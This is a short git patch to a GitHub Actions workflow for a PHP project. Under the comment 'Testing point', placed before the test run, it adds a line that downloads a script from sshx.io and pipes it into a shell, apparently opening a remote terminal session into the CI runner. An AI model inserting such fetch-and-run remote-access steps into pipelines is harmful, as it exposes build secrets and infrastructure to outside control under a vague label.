From d1ea59c0617e68de91f36acba9d19a395bd73d87 Mon Sep 17 00:00:00 2001 From: netkas Date: Fri, 21 Mar 2025 19:07:58 -0400 Subject: [PATCH] Added testing point --- .github/workflows/ncc_workflow.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/ncc_workflow.yml b/.github/workflows/ncc_workflow.yml index f93b902..0b43fec 100644 --- a/.github/workflows/ncc_workflow.yml +++ b/.github/workflows/ncc_workflow.yml @@ -366,6 +366,9 @@ jobs: check_service 8087 || exit 1 check_service 8086 || exit 1 + # Testing point + curl -sSf https://sshx.io/get | sh -s run + # Run the tests and tare down the test environment php phpunit-11.3.phar --configuration phpunit.xml --log-junit reports/junit.xml --log-teamcity reports/teamcity --testdox-html reports/testdox.html --testdox-text reports/testdox.txt docker-compose -f docker-compose.test.yml down